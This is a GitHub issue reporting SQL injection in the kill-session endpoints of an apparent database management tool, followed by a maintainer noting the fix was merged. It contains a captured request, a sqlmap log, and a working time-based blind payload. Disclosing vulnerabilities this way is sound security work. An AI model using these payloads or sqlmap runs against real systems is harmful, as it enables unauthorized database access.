Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[ bug ]MySQL会话管理存在sql注入风险 #1299

Closed
nick2wang opened this issue Dec 27, 2021 · 1 comment
Closed

[ bug ]MySQL会话管理存在sql注入风险 #1299

nick2wang opened this issue Dec 27, 2021 · 1 comment

Comments

@nick2wang
Copy link
Collaborator

应用版本/分支:1.8.2
MySQL版本:5.7.28
问题:kill会话时前端传入的thread_ids列表被当成纯字符串处理,存在sql注入风险
影响范围:
/db_diagnostic/create_kill_session/
/db_diagnostic/kill_session/

注入点:

sqlmap identified the following injection point(s) with a total of 124 HTTP(s) requests:
---
Parameter: ThreadIDs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: instance_name=192.168.1.201&ThreadIDs=[2857) AND (SELECT 3385 FROM (SELECT(SLEEP(5)))upGy) AND (2892=2892]
---

sqlmap请求样例 req.txt

POST /db_diagnostic/create_kill_session/ HTTP/1.1
Host: 192.168.1.111:9123
Connection: keep-alive
Content-Length: 68
Accept: application/json, text/javascript, */*; q=0.01
X-CSRFToken: vNe5oVVFsdGFkx05Lzkvn9i7NanddBH88YJbiOkevfEcLWMqHGPzNVky434V23Up
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.111:9123
Referer: http://192.168.1.111:9123/dbdiagnostic/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sessionid_dbgear_prod=cjoa73sj3zh8died9wrhxgco9mm8g0xt; csrftoken=vNe5oVVFsdGFkx05Lzkvn9i7NanddBH88YJbiOkevfEcLWMqHGPzNVky434V23Up; sessionid=uymn4ajmy3j8d5cseiqsjrgml3dbgpp2

instance_name=192.168.1.201&ThreadIDs=%5B3231%5D

sqlmap日志:

[root@m1 sqlmap]# sqlmap -r req.txt  -flush-session
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[*] starting @ 15:57:35 /2021-12-27/

[15:57:35] [INFO] parsing HTTP request from 'req.txt'
it appears that provided value for POST parameter 'ThreadIDs' has boundaries. Do you want to inject inside? ('[2857*]') [y/N] y
[15:57:41] [INFO] flushing session file
[15:57:41] [INFO] testing connection to the target URL
[15:57:41] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:57:43] [INFO] testing if the target URL content is stable
[15:57:43] [INFO] target URL content is stable
[15:57:43] [INFO] testing if POST parameter 'instance_name' is dynamic
[15:57:43] [INFO] POST parameter 'instance_name' appears to be dynamic
[15:57:43] [WARNING] heuristic (basic) test shows that POST parameter 'instance_name' might not be injectable
[15:57:43] [INFO] testing for SQL injection on POST parameter 'instance_name'
[15:57:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:57:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:57:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:57:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:57:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:57:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:57:44] [INFO] testing 'Generic inline queries'
[15:57:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:57:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:57:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:57:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:57:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:57:44] [INFO] testing 'Oracle AND time-based blind'
[15:57:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:57:48] [WARNING] POST parameter 'instance_name' does not seem to be injectable
[15:57:48] [INFO] testing if POST parameter 'ThreadIDs' is dynamic
[15:57:48] [WARNING] POST parameter 'ThreadIDs' does not appear to be dynamic
[15:57:48] [WARNING] heuristic (basic) test shows that POST parameter 'ThreadIDs' might not be injectable
[15:57:48] [INFO] testing for SQL injection on POST parameter 'ThreadIDs'
[15:57:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:57:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:57:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:57:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:57:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:57:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:57:49] [INFO] testing 'Generic inline queries'
[15:57:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:57:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:57:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:57:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:57:59] [INFO] POST parameter 'ThreadIDs' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:58:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:58:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:58:21] [INFO] checking if the injection point on POST parameter 'ThreadIDs' is a false positive
POST parameter 'ThreadIDs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 124 HTTP(s) requests:
---
Parameter: ThreadIDs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: instance_name=192.168.1.201&ThreadIDs=[2857) AND (SELECT 3385 FROM (SELECT(SLEEP(5)))upGy) AND (2892=2892]
---
[15:58:44] [INFO] the back-end DBMS is MySQL
[15:58:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web application technology: Nginx 1.16.1
back-end DBMS: MySQL >= 5.0.12

[*] ending @ 15:58:44 /2021-12-27/
@nick2wang nick2wang mentioned this issue Dec 27, 2021
Merged
hhyo added a commit that referenced this issue Dec 27, 2021
@hhyo
Merge pull request #1300 from nick2wang/nick-patch
02c8d8d 
修复会话管理存在的sql注入风险 #1299
@LeoQuote
Copy link
Collaborator

感谢, 现在 pr 已merge , closing

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@LeoQuote @nick2wang